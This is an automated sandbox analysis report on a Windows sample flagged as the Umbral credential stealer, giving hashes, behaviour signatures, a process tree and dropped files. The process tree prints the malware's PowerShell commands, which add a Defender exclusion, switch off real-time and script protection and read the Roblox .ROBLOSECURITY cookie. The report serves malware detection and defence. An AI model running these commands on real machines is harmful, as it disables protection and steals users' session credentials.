Overview

overview

10

Static

static

10

ogasda.exe

windows7-x64

10

ogasda.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    93s
  • max time network
    95s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-08-2024 11:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ogasda.exe

  • Size

    229KB

  • MD5

    33a10c04946e6aebc438b7cba8b42140

  • SHA1

    f4b94c6914cabde06072676547af27d1864373e6

  • SHA256

    f2ee9f8cda21c09cf9351463d0cc4dbe1d11ae8dadd8ebfc160ac436d186265e

  • SHA512

    39d288585b07eb81d82ba4f7b475782223b141804e2d1d5c2dae3077f6b7cb2f7778b36e1aa77388ac60fd9a6998b70fe5e99ff302dc23f5ca10c8c373212f1a

  • SSDEEP

    6144:lloZMCrIkd8g+EtXHkv/iD4ZeBZAmB5Kh/Cwhl0YSb8e1m6oOUi:noZZL+EP8ZeBZAmB5Kh/Cwhl0H9

Score
10/10
umbralcredential_accessexecutionspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ogasda.exe
    "C:\Users\Admin\AppData\Local\Temp\ogasda.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2120
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ogasda.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2040
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2476
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1468
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1428
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:676
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4568
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
        PID:5116
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:1564
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic" path win32_VideoController get name
        2⤵
        • Detects videocard installed
        PID:2144

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      944B

      MD5

      d28a889fd956d5cb3accfbaf1143eb6f

      SHA1

      157ba54b365341f8ff06707d996b3635da8446f7

      SHA256

      21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

      SHA512

      0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      948B

      MD5

      966914e2e771de7a4a57a95b6ecfa8a9

      SHA1

      7a32282fd51dd032967ed4d9a40cc57e265aeff2

      SHA256

      98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba

      SHA512

      dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      f1d680fc60cb57cf1ef932df1ffb00ce

      SHA1

      1418fbdf28a13aabe9afeb2dbacbafa609dc7a69

      SHA256

      50fb1e22f285507081a03d3e98baaee9d50338a21f29b5051c68608df08f78d2

      SHA512

      5320724ccf994430d84d6f442337bc19a0bc805d2247218b5802157aeb8f23b76b56094bd76a85c0b3664e8df3d9beaf6171a596c30d05afd2b1784d7a5beccf

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      2984662ba3f86d7fcf26758b5b76754d

      SHA1

      bc2a43ffd898222ee84406313f3834f226928379

      SHA256

      f0815f797b0c1829745dd65985f28d459688f91ceb2f3d76fed2d4309589bcde

      SHA512

      a06251a7a14559ebf5627a3c6b03fda9ded1d4ee44991283c824ccf5011cdf67665696d2d9b23507cbb3e3b9943b9e9f79ef28d3657eb61fb99920225417ab11

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_phakruaz.eqw.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/2040-3-0x000002305EAC0000-0x000002305EAE2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2040-13-0x00007FFD06410000-0x00007FFD06ED1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2040-14-0x00007FFD06410000-0x00007FFD06ED1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2040-15-0x00007FFD06410000-0x00007FFD06ED1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2040-18-0x00007FFD06410000-0x00007FFD06ED1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2120-0-0x00007FFD06413000-0x00007FFD06415000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2120-32-0x00000155677E0000-0x0000015567856000-memory.dmp

      Filesize

      472KB

      Download

    • memory/2120-33-0x0000015567500000-0x0000015567550000-memory.dmp

      Filesize

      320KB

      Download

    • memory/2120-34-0x00000155674B0000-0x00000155674CE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/2120-1-0x000001554D040000-0x000001554D080000-memory.dmp

      Filesize

      256KB

      Download

    • memory/2120-70-0x00000155674E0000-0x00000155674EA000-memory.dmp

      Filesize

      40KB

      Download

    • memory/2120-71-0x0000015567A10000-0x0000015567A22000-memory.dmp

      Filesize

      72KB

      Download

    • memory/2120-2-0x00007FFD06410000-0x00007FFD06ED1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2120-89-0x0000015567860000-0x0000015567A09000-memory.dmp

      Filesize

      1.7MB

      Download

    • memory/2120-90-0x00007FFD06410000-0x00007FFD06ED1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2476-31-0x0000019B2F530000-0x0000019B2F74C000-memory.dmp

      Filesize

      2.1MB

      Download